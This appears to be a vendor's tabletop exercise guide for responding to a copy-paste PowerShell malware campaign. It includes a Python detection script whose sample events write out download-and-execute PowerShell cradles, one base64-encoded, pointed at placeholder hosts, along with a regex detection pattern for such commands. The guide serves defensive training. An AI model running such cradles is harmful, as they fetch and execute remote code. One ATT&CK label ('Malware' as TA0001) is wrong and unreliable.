Introduction
Threat actors are using fake browser updates and software fixes to trick users into cutting, copying, and pasting PowerShell scripts loaded with various malware strains, including remote access Trojans (RATs) and infostealers, to infect their computers.
This tabletop exercise is relevant for organizations that use:
- Web browsers and productivity software vulnerable to social engineering attacks
- PowerShell scripting for system administration tasks
- Endpoint security tools to detect and prevent malware infections
Is your role listed? If so, you might want to pay closer attention!
- IT administrators responsible for managing endpoints and scripting tools
- Security analysts who monitor for and investigate potential compromises
- Incident responders tasked with containing and eradicating malware
Simulation Start Points
Compelling starting points for this tabletop exercise could include:
- An employee reports receiving a suspicious error message prompting them to copy/paste a PowerShell command to fix their browser or Word application
- Endpoint detection tools alert on a spike in PowerShell executions across multiple laptops and desktops
- The security team identifies command-and-control traffic to known malware distribution domains
- Help desk tickets about slow computer performance and unauthorized browser extensions flood in
Tabletop Simulation Phases
The exercise should step through these key incident response phases:
Detection and Analysis
- Triage user reports and correlate with endpoint telemetry to identify the scope of the attack
- Analyze malware payloads and infrastructure to determine attacker TTPs
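As an added example for the triage step above (not part of the original exercise), the following Python scores constructed process-creation events for the cut-and-paste pattern: PowerShell launched from a user-facing parent such as Explorer or Word, with hidden/encoded/download-cradle switches, and groups hits by host to show scope. Event field names, hostnames, users and URLs are all assumptions; map the fields to your EDR or Sysmon schema.

```python
import base64
import re
from collections import defaultdict

_enc = lambda s: base64.b64encode(s.encode("utf-16-le")).decode()  # the form -EncodedCommand takes
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample process-creation events (Sysmon Event ID 1 style); field names are an assumption.
TELEMETRY = [
    {"host": "LT-0142", "user": "jdoe", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -w hidden -nop -enc " + _enc(
         "iex (New-Object Net.WebClient).DownloadString('http://update-fix.example/fix.ps1')")},
    {"host": "WS-0077", "user": "asmith", "image": PS, "parent_image": r"C:\Office16\WINWORD.EXE",
     "command_line": 'powershell.exe -ep bypass -c "iex (irm http://doc-repair.example/r.ps1)"'},
    {"host": "SRV-ADM-01", "user": "svc_backup", "image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # routine admin use
]
POWERSHELL = re.compile(r"(powershell|pwsh)\.exe$", re.I)
# Parents the user drives directly: Explorer (Run box) and the apps the fake error dialogs imitate.
USER_FACING_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SUSPICIOUS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-e(?:c|nc|ncodedcommand)?(?=\s)"
    r"|-e(?:p|xecutionpolicy)\s+bypass|\biex\b|invoke-expression|downloadstring|\birm\b|\bmshta\b", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE), or None if absent/undecodable."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):  # collect independent signals; any one alone is common in benign admin use
    reasons = []
    parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in USER_FACING_PARENTS:
        reasons.append("launched from user-facing parent " + parent)
    decoded = decode_encoded_command(ev["command_line"])
    text = ev["command_line"] + (" " + decoded if decoded else "")  # scan the decoded script as well
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(text)})
    if hits:
        reasons.append("suspicious tokens: " + ", ".join(hits) + (f" (decoded: {decoded[:50]})" if decoded else ""))
    return reasons

def triage(events, min_signals=2):  # flag PowerShell launches with >= min_signals signals, grouped by host
    findings = defaultdict(list)
    for ev in (e for e in events if POWERSHELL.search(e["image"])):
        reasons = score_event(ev)
        if len(reasons) >= min_signals:
            findings[ev["host"]].append({"user": ev["user"], "reasons": reasons})
    return dict(findings)
```

Requiring two independent signals keeps the scheduled backup job on SRV-ADM-01 out of the findings while both user-driven launches are flagged; the per-host grouping is what tells you whether this is one click or a spike across the fleet.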
Containment
- Isolate infected endpoints to prevent malware propagation
- Block malicious domains and restrict PowerShell execution policies
Eradication
- Remove malware persistence mechanisms and artifacts from compromised systems
- Close the social engineering vectors that enabled initial access
Recovery
- Restore endpoints and user productivity with clean images and patched software
- Monitor for signs of re-infection or lateral movement
Post-Incident Activity
- Conduct a root cause analysis and document lessons learned
- Implement security control improvements, such as attack surface reduction rules and user awareness training
Inject Ideas
Spice up your exercise with challenging injects like:
- The attacker exfiltrates sensitive customer data and threatens to leak it unless a ransom is paid
- IT discovers that the malware exploited an unpatched zero-day vulnerability
- Malicious PowerShell payloads are found in legitimate repositories and software update mechanisms
- The incident handler laptop gets infected while triaging compromised systems
MITRE ATT&CK Techniques
Map this scenario to the ATT&CK framework for threat-informed defense:
- User Execution (T1204) - Attackers relied on users copying and pasting malicious code
- Obfuscated Files or Information (T1027) - PowerShell scripts were likely encoded to evade detection
- Malware (TA0001) - RATs and infostealers were deployed on objectives
- Command and Control (TA0011) - Malware communicated with attacker-controlled infrastructure
About ChaosTrack
Streamline your tabletop simulation experience with ChaosTrack - run exercises in 85% less time and for 90% less money. Regular practice through tabletop exercises is crucial for improving your organization's resilience against emerging threats like the cut-and-paste malware campaign covered in this article. Learn more at chaostrack.com.